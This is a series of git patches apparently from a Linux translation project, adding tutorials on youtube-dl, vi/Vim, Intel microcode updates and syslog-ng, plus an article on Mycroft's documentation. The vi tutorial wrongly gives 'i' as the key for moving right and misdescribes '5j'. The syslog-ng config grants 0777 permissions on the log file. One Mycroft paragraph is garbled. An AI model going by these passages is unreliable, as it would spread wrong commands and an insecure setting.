+你也可以下载指定频道中的所有视频,只需要把频道的 URL 放到后面就行,如下所示:
+
+```
+youtube-dl -citw https://www.youtube.com/channel/UCatfiM69M9ZnNhOzy0jZ41A
+```
+
+若你的网络需要通过代理,那么可以使用 `--proxy` 来下载视频:
+
+```
+youtube-dl --proxy http://proxy-ip:port https://www.youtube.com/watch?v=j_JgXJ-apXs
+```
+
+若想一条命令下载多个 Youtube 视频,那么首先把所有要下载的 Youtube 视频 URL 存在一个文件中(假设这个文件叫 youtube-list.txt),然后运行下面命令:
+
+```
+youtube-dl -a youtube-list.txt
+```
+
+### 安装 Youtube-dl GUI
+
+若你想要图形化的界面,那么 youtube-dlg 是你最好的选择。youtube-dlg 是一款由 wxPython 所写的免费而开源的 youtube-dl 界面。
+
+该工具默认也不在 Ubuntu 16.04 仓库中。因此你需要为它添加 PPA。
+
+```
+sudo add-apt-repository ppa:nilarimogard/webupd8
+```
+
+下一步,更新软件包仓库并安装 youtube-dlg:
+
+```
+sudo apt-get update -y
+sudo apt-get install youtube-dlg -y
+```
+
+安装好 Youtube-dl 后,就能在 `Unity Dash` 中启动它了:
+
+[![][2]][3]
+
+[![][4]][5]
+
+现在你只需要将 URL 粘贴到上图中的 URL 域就能下载视频了。Youtube-dlg 对于那些不太懂命令行的人来说很有用。
+
+### 结语
+
+恭喜你!你已经成功地在 Ubuntu 16.04 服务器上安装好了 youtube-dl 和 youtube-dlg。你可以很方便地从 Youtube 及任何 youtube-dl 支持的网站上以任何格式和任何大小下载视频了。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/install-and-use-youtube-dl-on-ubuntu-1604/
+
+作者:[Hitesh Jethva][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:/cdn-cgi/l/email-protection
+[2]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dash.png
+[3]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dash.png
+[4]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dashboard.png
+[5]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dashboard.png
From 7181a7b093ec826833cae1b3e95d770ce5ea0b7d Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:04:41 +0800
Subject: [PATCH 239/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Working=20with=20?=
=?UTF-8?q?VI=20editor=20:=20The=20Basics?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...511 Working with VI editor - The Basics.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20170511 Working with VI editor - The Basics.md
diff --git a/sources/tech/20170511 Working with VI editor - The Basics.md b/sources/tech/20170511 Working with VI editor - The Basics.md
new file mode 100644
index 0000000000..4056c3c9ec
--- /dev/null
+++ b/sources/tech/20170511 Working with VI editor - The Basics.md
@@ -0,0 +1,138 @@
+Working with VI editor : The Basics
+======
+VI editor is a powerful command line based text editor that was originally created for Unix but has since been ported to various Unix & Linux distributions. In Linux there exists another, advanced version of VI editor called VIM (also known as VI IMproved ). VIM only adds funtionalities to already powefrul VI editor, some of the added functionalities a
+
+ * Support for many more Linux distributions,
+
+ * Support for various coding languages like python, c++, perl etc with features like code folding , code highlighting etc
+
+ * Can be used to edit files over network protocols like ssh and http,
+
+ * Support to edit files inside a compressed archive,
+
+ * Allows screen to split for editing multiple files.
+
+
+
+
+Now let's discuss the commands/options that we can use with VI/VIM. For the purposes of this tutorial, we are going to use VI as an example but all the commands with VI can be used with VIM as well. But firstly we will start out with the two modes of VI text editor,
+
+### Command Mode
+
+This mode allows to handle tasks like saving files, executing a command within vi, copy/cut/paste operations, & tasks like finding/replacing. When in Insert mode, we can press escape to exit into command mode.
+
+### Insert Mode
+
+It's where we insert text into the file. To get into insert mode, we will press 'i' in command line mode.
+
+### Creating a file
+
+In order to create a file, use
+
+```
+ $ vi filename
+```
+
+Once the file is created & opened, we will enter into what's called a command mode & to enter text into the file, we need to use insert mode. Let's learn in brief about these two modes,
+
+### Exit out of Vi
+
+To exit out of Vi from insert mode, we will first press 'Esc' key to exit into command mode & here we can perform following tasks to exit out of vi,
+
+ 1. Exit without saving file- to exit out of vi command mode without saving of file, type : `:q!`
+
+ 2. Save file & exit - To save a file & exit, type: `:wq`
+
+Now let's discuss the commands/options that can be used in command mode.
+
+### Cursor movement
+
+Use the keys mentioned below to manipulate the cursor position
+
+ 1. **k** moves cursor one line up
+
+ 2. **j ** moves cursor one line down
+
+ 3. **h ** moves cursor to left one character postion
+
+ 4. **i** moves cursor to right one character position
+
+
+
+
+ **Note :** If want to move multiple line up or down or left or right, we can use 4k or 5j, which will move cursor 4 lines up or 5 characters right respectively.
+
+ 5. **0** cursor will be at begining of the line
+
+ 6. **$** cursor will be at the end of a line
+
+ 7. ** nG** moves to nth line of the file
+
+ 8. **G** moves to last line of the file
+
+ 9. **{ ** moves a paragraph back
+
+ 10. **}** moves a paragraph forward
+
+
+
+
+There are several other options that can be used to manage the cursor movement but these should get the work done for you.
+
+### Editing files
+
+Now we will learn the options that can be used in command mode to change our mode to Insert mode for editing the files
+
+ 1. **i** Inserts text before the current cursor location
+
+ 2. **I** Inserts text at the beginning of the current line
+
+ 3. ** a ** Inserts text after the current cursor location
+
+ 4. **A ** Inserts text at the end of the current line
+
+ 5. **o** Creates a new line for text entry below the cursor location
+
+ 6. ** O** Creates a new line for text entry above the cursor location
+
+
+
+
+### Deleting file text
+
+All of these commands will be excuted from command mode, so if you are in Insert mode exit out to command mode using the 'Esc' key
+
+ 1. **dd** will delete the complete line of the cursor, can use a number like 2dd to delete next 2 lines after the cursor
+
+ 2. **d$** deletes from cursor position till end of the line
+
+ 3. **d^** deletes from cursor position till beginning of line
+
+ 4. **dw** deletes from cursor to next word
+
+
+### Copy & paste commands
+
+ 1. **yy** to yank or copy the current line. Can be used with a number to copy a number of lines
+
+ 2. **p** paste the copied lines after cursor position
+
+ 3. **P** paste the copied lines before the cursor postion
+
+
+
+
+These were some the basic operations that we can use with VI or VIM editor. In our future tutorials, we leanrn to perform some advanced operations with VI/VIM editors. If having any queries or comments, please leave them in the comment box below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/working-vi-editor-basics/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
From a69162a58b8571b063ad48a95f7849b25eea4c83 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:10:16 +0800
Subject: [PATCH 240/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Working=20with=20?=
=?UTF-8?q?Vi/Vim=20Editor=20:=20Advanced=20concepts?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... with Vi-Vim Editor - Advanced concepts.md | 116 ++++++++++++++++++
1 file changed, 116 insertions(+)
create mode 100644 sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
diff --git a/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
new file mode 100644
index 0000000000..052069d66a
--- /dev/null
+++ b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
@@ -0,0 +1,116 @@
+Working with Vi/Vim Editor : Advanced concepts
+======
+Earlier we have discussed some basics about VI/VIM editor but VI & VIM are both very powerful editors and there are many other functionalities that can be used with these editors. In this tutorial, we are going to learn some advanced uses of VI/VIM editor.
+
+( **Recommended Read** : [Working with VI editor : The Basics ][1])
+
+## Opening multiple files with VI/VIM editor
+
+To open multiple files, command would be same as is for a single file; we just add the file name for second file as well.
+
+```
+ $ vi file1 file2 file 3
+```
+
+Now to browse to next file, we can use
+
+```
+$ :n
+```
+
+or we can also use
+
+```
+$ :e filename
+```
+
+## Run external commands inside the editor
+
+We can run external Linux/Unix commands from inside the vi editor, i.e. without exiting the editor. To issue a command from editor, go back to Command Mode if in Insert mode & we use the BANG i.e. '!' followed by the command that needs to be used. Syntax for running a command is,
+
+```
+$ :! command
+```
+
+An example for this would be
+
+```
+$ :! df -H
+```
+
+## Searching for a pattern
+
+To search for a word or pattern in the text file, we use following two commands in command mode,
+
+ * command '/' searches the pattern in forward direction
+
+ * command '?' searched the pattern in backward direction
+
+
+Both of these commands are used for same purpose, only difference being the direction they search in. An example would be,
+
+ `$ :/ search pattern` (If at beginning of the file)
+
+ `$ :/ search pattern` (If at the end of the file)
+
+## Searching & replacing a pattern
+
+We might be required to search & replace a word or a pattern from our text files. So rather than finding the occurrence of word from whole text file & replace it, we can issue a command from the command mode to replace the word automatically. Syntax for using search & replacement is,
+
+```
+$ :s/pattern_to_be_found/New_pattern/g
+```
+
+Suppose we want to find word "alpha" & replace it with word "beta", the command would be
+
+```
+$ :s/alpha/beta/g
+```
+
+If we want to only replace the first occurrence of word "alpha", then the command would be
+
+```
+$ :s/alpha/beta/
+```
+
+## Using Set commands
+
+We can also customize the behaviour, the and feel of the vi/vim editor by using the set command. Here is a list of some options that can be use set command to modify the behaviour of vi/vim editor,
+
+ `$ :set ic ` ignores cases while searching
+
+ `$ :set smartcase ` enforce case sensitive search
+
+ `$ :set nu` display line number at the begining of the line
+
+ `$ :set hlsearch ` highlights the matching words
+
+ `$ : set ro ` change the file type to read only
+
+ `$ : set term ` prints the terminal type
+
+ `$ : set ai ` sets auto-indent
+
+ `$ :set noai ` unsets the auto-indent
+
+Some other commands to modify vi editors are,
+
+ `$ :colorscheme ` its used to change the color scheme for the editor. (for VIM editor only)
+
+ `$ :syntax on ` will turn on the color syntax for .xml, .html files etc. (for VIM editor only)
+
+This complete our tutorial, do mention your queries/questions or suggestions in the comment box below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/working-vivim-editor-advanced-concepts/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/working-vi-editor-basics/
From b620ffa479a8e2c4701d6f07d753354720cb4bf7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:16:21 +0800
Subject: [PATCH 241/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20instal?=
=?UTF-8?q?l/update=20Intel=20microcode=20firmware=20on=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...pdate Intel microcode firmware on Linux.md | 155 ++++++++++++++++++
1 file changed, 155 insertions(+)
create mode 100644 sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md
diff --git a/sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md b/sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md
new file mode 100644
index 0000000000..a43ddb27ce
--- /dev/null
+++ b/sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md
@@ -0,0 +1,155 @@
+How to install/update Intel microcode firmware on Linux
+======
+
+
+I am a new Linux sysadmin. How do I install or update microcode firmware for Intel/AMD CPUs on Linux using the command line option?
+
+
+A microcode is nothing but CPU firmware provided by Intel or AMD. The Linux kernel can update the CPU's firmware without the BIOS update at boot time. Processor microcode is stored in RAM and kernel update the microcode during every boot. These microcode updates from Intel/AMD needed to fix bugs or apply errata to avoid CPU bugs. This page shows how to install AMD or Intel microcode update using package manager or processor microcode updates supplied by Intel on Linux.
+
+## How to find out current status of microcode
+
+
+Run the following command as root user:
+`# dmesg | grep microcode`
+Sample outputs:
+
+[![Verify microcode update on a CentOS RHEL Fedora Ubuntu Debian Linux][1]][1]
+
+Please note that it is entirely possible that there is no microcode update available for your CPU. In that case it will look as follows:
+```
+[ 0.952699] microcode: sig=0x306a9, pf=0x10, revision=0x1c
+[ 0.952773] microcode: Microcode Update Driver: v2.2.
+
+```
+
+## How to install Intel microcode firmware on Linux using a package manager
+
+Tool to transform and deploy CPU microcode update for x86/amd64 comes with Linux. The procedure to install AMD or Intel microcode firmware on Linux is as follows:
+
+ 1. Open the terminal app
+ 2. Debian/Ubuntu Linux user type: **sudo apt install intel-microcode**
+ 3. CentOS/RHEL Linux user type: **sudo yum install microcode_ctl**
+
+
+
+The package names are as follows for popular Linux distros:
+
+ * microcode_ctl and linux-firmware - CentOS/RHEL microcode update package
+ * intel-microcode - Debian/Ubuntu and clones microcode update package for Intel CPUS
+ * amd64-microcode - Debian/Ubuntu and clones microcode firmware for AMD CPUs
+ * linux-firmware - Arch Linux microcode firmware for AMD CPUs (installed by default and no action is needed on your part)
+ * intel-ucode - Arch Linux microcode firmware for Intel CPUs
+ * microcode_ctl and ucode-intel - Suse/OpenSUSE Linux microcode update package
+
+
+
+**Warning** : In some cases, microcode update may cause boot issues such as server getting hang or resets automatically at the time of boot. The procedure worked for me, and I am an experienced sysadmin. I do not take responsibility for any hardware failures. Do it at your own risk.
+
+### Examples
+
+Type the following [apt command][2]/[apt-get command][3] on a Debian/Ubuntu Linux for Intel CPU:
+
+`$ sudo apt-get install intel-microcode`
+
+Sample outputs:
+
+[![How to install Intel microcode firmware Linux][4]][4]
+
+You [must reboot the box to activate micocode][5] update:
+
+`$ sudo reboot`
+
+Verify it after reboot:
+
+`# dmesg | grep 'microcode'`
+
+Sample outputs:
+
+```
+[ 0.000000] microcode: microcode updated early to revision 0x1c, date = 2015-02-26
+[ 1.604672] microcode: sig=0x306a9, pf=0x10, revision=0x1c
+[ 1.604976] microcode: Microcode Update Driver: v2.01 , Peter Oruba
+
+```
+
+If you are using RHEL/CentOS try installing or updating the following two packages using [yum command][6]:
+
+```
+$ sudo yum install linux-firmware microcode_ctl
+$ sudo reboot
+$ sudo dmesg | grep 'microcode'
+```
+
+## How to update/install microcode downloaded from Intel site
+
+Only use the following method when recommended by your vendor otherwise stick to Linux packages as described above. Most Linux distro maintainer update microcode via the package manager. Package manager method is safe as tested by many users.
+
+### How to install Intel processor microcode blob for Linux (20180108 release)
+
+Ok, first visit AMD or [Intel site][7] to grab the latest microcode firmware. In this example, I have a file named ~/Downloads/microcode-20180108.tgz (don't forget to check for checksum) that suppose to help with meltdown/Spectre. First extract it using the tar command:
+```
+$ mkdir firmware
+$ cd firmware
+$ tar xvf ~/Downloads/microcode-20180108.tgz
+$ ls -l
+```
+
+Sample outputs:
+
+```
+drwxr-xr-x 2 vivek vivek 4096 Jan 8 12:41 intel-ucode
+-rw-r--r-- 1 vivek vivek 4847056 Jan 8 12:39 microcode.dat
+-rw-r--r-- 1 vivek vivek 1907 Jan 9 07:03 releasenote
+
+```
+
+Make sure /sys/devices/system/cpu/microcode/reload exits:
+
+`$ ls -l /sys/devices/system/cpu/microcode/reload`
+
+You must copy all files from intel-ucode to /lib/firmware/intel-ucode/ using the [cp command][8]:
+
+`$ sudo cp -v intel-ucode/* /lib/firmware/intel-ucode/`
+
+You just copied intel-ucode directory to /lib/firmware/. Write the reload interface to 1 to reload the microcode files:
+
+`# echo 1 > /sys/devices/system/cpu/microcode/reload`
+
+Update an existing initramfs so that next time it get loaded via kernel:
+
+```
+$ sudo update-initramfs -u
+$ sudo reboot
+```
+Verifying that microcode got updated on boot or reloaded by echo command:
+`# dmesg | grep microcode`
+
+That is all. You have just updated firmware for your Intel CPU.
+
+## about the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][9], [Facebook][10], [Google+][11].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/install-update-intel-microcode-firmware-linux/
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/media/new/faq/2018/01/Verify-microcode-update-on-a-CentOS-RHEL-Fedora-Ubuntu-Debian-Linux.jpg
+[2]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[4]:https://www.cyberciti.biz/media/new/faq/2018/01/How-to-install-Intel-microcode-firmware-Linux.jpg
+[5]:https://www.cyberciti.biz/faq/howto-reboot-linux/
+[6]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[7]:https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File
+[8]:https://www.cyberciti.biz/faq/cp-copy-command-in-unix-examples/ (See Linux/Unix cp command examples for more info)
+[9]:https://twitter.com/nixcraft
+[10]:https://facebook.com/nixcraft
+[11]:https://plus.google.com/+CybercitiBiz
From eeccdf793536b15f4b54af9664882dfd2d32f562 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:20:48 +0800
Subject: [PATCH 242/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use=20?=
=?UTF-8?q?syslog-ng=20to=20collect=20logs=20from=20remote=20Linux=20machi?=
=?UTF-8?q?nes?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...collect logs from remote Linux machines.md | 111 ++++++++++++++++++
1 file changed, 111 insertions(+)
create mode 100644 sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md
diff --git a/sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md b/sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md
new file mode 100644
index 0000000000..ba1312b426
--- /dev/null
+++ b/sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md
@@ -0,0 +1,111 @@
+How to use syslog-ng to collect logs from remote Linux machines
+======
+![linuxhero.jpg][1]
+
+Image: Jack Wallen
+
+Let's say your data center is filled with Linux servers and you need to administer them all. Part of that administration job is viewing log files. But if you're looking at numerous machines, that means logging into each machine individually, reading log files, and then moving onto the next. Depending upon how many machines you have, that can take a large chunk of time from your day.
+
+Or, you could set up a single Linux machine to collect those logs. That would make your day considerably more efficient. To do this, you could opt for a number of different system, one of which is syslog-ng.
+
+The problem with syslog-ng is that the documentation isn't the easiest to comb through. However, I've taken care of that and am going to lay out the installation and configuration in such a way that you can have syslog-ng up and running in no time. I'll be demonstrating on Ubuntu Server 16.04 on a two system setup:
+
+ * UBUNTUSERVERVM at IP address 192.168.1.118 will serve as log collector
+ * UBUNTUSERVERVM2 will serve as a client, sending log files to the collector
+
+
+
+Let's install and configure.
+
+## Installation
+
+The installation is simple. I'll be installing from the standard repositories, in order to make this as easy as possible. To do this, open up a terminal window and issue the command:
+```
+sudo apt install syslog-ng
+```
+
+You must issue the above command on both collector and client. Once that's installed, you're ready to configure.
+
+## Configuration for the collector
+
+We'll start with the configuration of the log collector. The configuration file is /etc/syslog-ng/syslog-ng.conf. Out of the box, syslog-ng includes a configuration file. We're not going to use that. Let's rename the default config file with the command sudo mv /etc/syslog-ng/syslog-ng.conf /etc/syslog-ng/syslog-ng.conf.BAK. Now create a new configuration file with the command sudo nano /etc/syslog/syslog-ng.conf. In that file add the following:
+```
+@version: 3.5
+@include "scl.conf"
+@include "`scl-root`/system/tty10.conf"
+ options {
+ time-reap(30);
+ mark-freq(10);
+ keep-hostname(yes);
+ };
+ source s_local { system(); internal(); };
+ source s_network {
+ syslog(transport(tcp) port(514));
+ };
+ destination d_local {
+ file("/var/log/syslog-ng/messages_${HOST}"); };
+ destination d_logs {
+ file(
+ "/var/log/syslog-ng/logs.txt"
+ owner("root")
+ group("root")
+ perm(0777)
+ ); };
+ log { source(s_local); source(s_network); destination(d_logs); };
+```
+
+Do note that we are working with port 514, so you'll need to make sure it is accessible on your network.
+
+Save and close the file. The above configuration will dump the desired log files (denoted with system() and internal()) into /var/log/syslog-ng/logs.txt. Because of this, you need to create the directory and file with the following commands:
+```
+sudo mkdir /var/log/syslog-ng
+sudo touch /var/log/syslog-ng/logs.txt
+```
+
+Start and enable syslog-ng with the commands:
+```
+sudo systemctl start syslog-ng
+sudo systemctl enable syslog-ng
+```
+
+## Configuration for the client
+
+We're going to do the very same thing on the client (moving the default configuration file and creating a new configuration file). Copy the following text into the new client configuration file:
+```
+@version: 3.5
+@include "scl.conf"
+@include "`scl-root`/system/tty10.conf"
+source s_local { system(); internal(); };
+destination d_syslog_tcp {
+ syslog("192.168.1.118" transport("tcp") port(514)); };
+log { source(s_local);destination(d_syslog_tcp); };
+```
+
+Note: Change the IP address to match the address of your collector server.
+
+Save and close that file. Start and enable syslog-ng in the same fashion you did on the collector.
+
+## View the log files
+
+Head back to your collector and issue the command sudo tail -f /var/log/syslog-ng/logs.txt. You should see output that includes log entries for both collector and client ( **Figure A** ).
+
+ **Figure A**
+
+![Figure A][3]
+
+Congratulations, syslog-ng is working. You can now log into your collector to view logs from both the local machine and the remote client. If you have more Linux servers in your data center, walk through the process of installing syslog-ng and setting each of them up as a client to send their logs to the collector, so you no longer have to log into individual machines to view logs.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.techrepublic.com/article/how-to-use-syslog-ng-to-collect-logs-from-remote-linux-machines/
+
+作者:[Jack Wallen][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://tr1.cbsistatic.com/hub/i/r/2017/01/11/51204409-68e0-49b8-a637-01af26be85f6/resize/770x/688dfedad4ed30ec4baf548c2adb8cd4/linuxhero.jpg
+[3]:https://tr4.cbsistatic.com/hub/i/2018/01/09/6a24e5c0-6a29-46d3-8a66-bc72747b5beb/6f94d3e6c6c2121fab6223ed9d8c6aa6/syslognga.jpg
From 50c158f4957bdf87d57e93f4f0531822f39fd5b9 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:30:37 +0800
Subject: [PATCH 243/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20Mycroft=20u?=
=?UTF-8?q?sed=20WordPress=20and=20GitHub=20to=20improve=20its=20documenta?=
=?UTF-8?q?tion?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...and GitHub to improve its documentation.md | 116 ++++++++++++++++++
1 file changed, 116 insertions(+)
create mode 100644 sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
diff --git a/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md b/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
new file mode 100644
index 0000000000..9e35e0ede7
--- /dev/null
+++ b/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
@@ -0,0 +1,116 @@
+How Mycroft used WordPress and GitHub to improve its documentation
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/doc-dish-lead-2.png?itok=lPO6tqPd)
+
+Image credits : Photo by Unsplash; modified by Rikki Endsley. CC BY-SA 4.0
+
+Imagine you've just joined a new technology company, and one of the first tasks you're assigned is to improve and centralize the organization's developer-facing documentation. There's just one catch: That documentation exists in many different places, across several platforms, and differs markedly in accuracy, currency, and style.
+
+So how did we tackle this challenge?
+
+### Understanding the scope
+
+As with any project, we first needed to understand the scope and bounds of the problem we were trying to solve. What documentation was good? What was working? What wasn't? How much documentation was there? What format was it in? We needed to do a **documentation audit**. Luckily, [Aneta Šteflova][1] had recently [published an article on OpenSource.com][2] about this, and it provided excellent guidance.
+
+![mycroft doc audit][4]
+
+Mycroft documentation audit, showing source, topic, medium, currency, quality and audience
+
+Next, every piece of publicly facing documentation was assessed for the topic it covered, the medium it used, currency, and quality. A pattern quickly emerged that different platforms had major deficiencies, allowing us to make a data-driven approach to decommission our existing Jekyll-based sites. The audit also highlighted just how fragmented our documentation sources were--we had developer-facing documentation across no fewer than seven sites. Although search engines were finding this content just fine, the fragmentation made it difficult for developers and users of Mycroft--our primary audiences--to navigate the information they needed. Again, this data helped us make the decision to centralize our documentation on to one platform.
+
+### Choosing a central platform
+
+As an organization, we wanted to constrain the number of standalone platforms in use. Over time, maintenance and upkeep of multiple platforms and integration touchpoints becomes cumbersome for any organization, but this is exacerbated for a small startup.
+
+One of the other business drivers in platform choice was that we had two primary but very different audiences. On one hand, we had highly technical developers who we were expecting would push documentation to its limits--and who would want to contribute to technical documentation using their tools of choice--[Git][5], [GitHub][6], and [Markdown][7]. Our second audience--end users--would primarily consume technical documentation and would want to do so in an inviting, welcoming platform that was visually appealing and provided additional features such as the ability to identify reading time and to provide feedback. The ability to capture feedback was also a key requirement from our side as without feedback on the quality of the documentation, we would not have a solid basis to undertake continuous quality improvement.
+
+Would we be able to identify one platform that met all of these competing needs?
+
+We realised that two platforms covered all of our needs:
+
+ * [WordPress][8]: Our existing website is built on WordPress, and we have some reasonably robust WordPress skills in-house. The flexibility of WordPress also fulfilled our requirements for functionality like reading time and the ability to capture user feedback.
+ * [GitHub][9]: Almost [all of Mycroft.AI's source code is available on GitHub][10], and our development team uses this platform daily.
+
+
+
+But how could we marry the two?
+
+
+![](https://opensource.com/sites/default/files/images/life-uploads/wordpress-github-sync.png)
+
+### Integrating WordPress and GitHub with WordPress GitHub Sync
+
+Luckily, our COO, [Nate Tomasi][11], spotted a WordPress plugin that promised to integrate the two.
+
+This was put through its paces on our test website, and it passed with flying colors. It was easy to install, had a straightforward configuration, which just required an OAuth token and webhook with GitHub, and provided two-way integration between WordPress and GitHub.
+
+It did, however, have a dependency--on Markdown--which proved a little harder to implement. We trialed several Markdown plugins, but each had several quirks that interfered with the rendering of non-Markdown-based content. After several days of frustration, and even an attempt to custom-write a plugin for our needs, we stumbled across [Parsedown Party][12]. There was much partying! With WordPress GitHub Sync and Parsedown Party, we had integrated our two key platforms.
+
+Now it was time to make our content visually appealing and usable for our user audience.
+
+### Reading time and feedback
+
+To implement the reading time and feedback functionality, we built a new [page template for WordPress][13], and leveraged plugins within the page template.
+
+Knowing the estimated reading time of an article in advance has been [proven to increase engagement with content][14] and provides developers and users with the ability to decide whether to read the content now or bookmark it for later. We tested several WordPress plugins for reading time, but settled on [Reading Time WP][15] because it was highly configurable and could be easily embedded into WordPress page templates. Our decision to place Reading Time at the top of the content was designed to give the user the choice of whether to read now or save for later. With Reading Time in place, we then turned our attention to gathering user feedback and ratings for our documentation.
+
+![](https://opensource.com/sites/default/files/images/life-uploads/screenshot-from-2017-12-08-00-55-31.png)
+
+There are several rating and feedback plugins available for WordPress. We needed one that could be easily customized for several use cases, and that could aggregate or summarize ratings. After some experimentation, we settled on [Multi Rating Pro][16] because of its wide feature set, especially the ability to create a Review Ratings page in WordPress--i.e., a central page where staff can review ratings without having to be logged in to the WordPress backend. The only gap we ran into here was the ability to set the display order of rating options--but it will likely be added in a future release.
+
+The WordPress GitHub Integration plugin also gave us the ability to link back to the GitHub repository where the original Markdown content was held, inviting technical developers to contribute to improving our documentation.
+
+### Updating the existing documentation
+
+Now that the "container" for our new documentation had been developed, it was time to update the existing content. Because much of our documentation had grown organically over time, there were no style guidelines to shape how keywords and code were styled. This was tackled first, so that it could be applied to all content. [You can see our content style guidelines on GitHub.][17]
+
+As part of the update, we also ran several checks to ensure that the content was technically accurate, augmenting the existing documentation with several images for better readability.
+
+There were also a couple of additional tools that made creating internal links for documentation pieces easier. First, we installed the [WP Anchor Header][18] plugin. This plugin provided a small but important function: adding `id` content in GitHub using the `[markdown-toc][19]` library, then simply copied in to the WordPress content, where they would automatically link to the `id` attributes to each `
`, `` (and so on) element. This meant that internal anchors could be automatically generated on the command line from the Markdown content in GitHub using the `[markdown-toc][19]` library, then simply copied in to the WordPress content, where they would automatically link to the `id` attributes generated by WP Anchor Header.
+
+Next, we imported the updated documentation into WordPress from GitHub, and made sure we had meaningful and easy-to-search on slugs, descriptions, and keywords--because what good is excellent documentation if no one can find it?! A final activity was implementing redirects so that people hitting the old documentation would be taken to the new version.
+
+### What next?
+
+[Please do take a moment and have a read through our new documentation][20]. We know it isn't perfect--far from it--but we're confident that the mechanisms we've baked into our new documentation infrastructure will make it easier to identify gaps--and resolve them quickly. If you'd like to know more, or have suggestions for our documentation, please reach out to Kathy Reid on [Chat][21] (@kathy-mycroft) or via [email][22].
+
+_Reprinted with permission from[Mycroft.ai][23]._
+
+### About the author
+Kathy Reid - Director of Developer Relations @MycroftAI, President of @linuxaustralia. Kathy Reid has expertise in open source technology management, web development, video conferencing, digital signage, technical communities and documentation. She has worked in a number of technical and leadership roles over the last 20 years, and holds Arts and Science undergraduate degrees... more about Kathy Reid
+
+--------------------------------------------------------------------------------
+
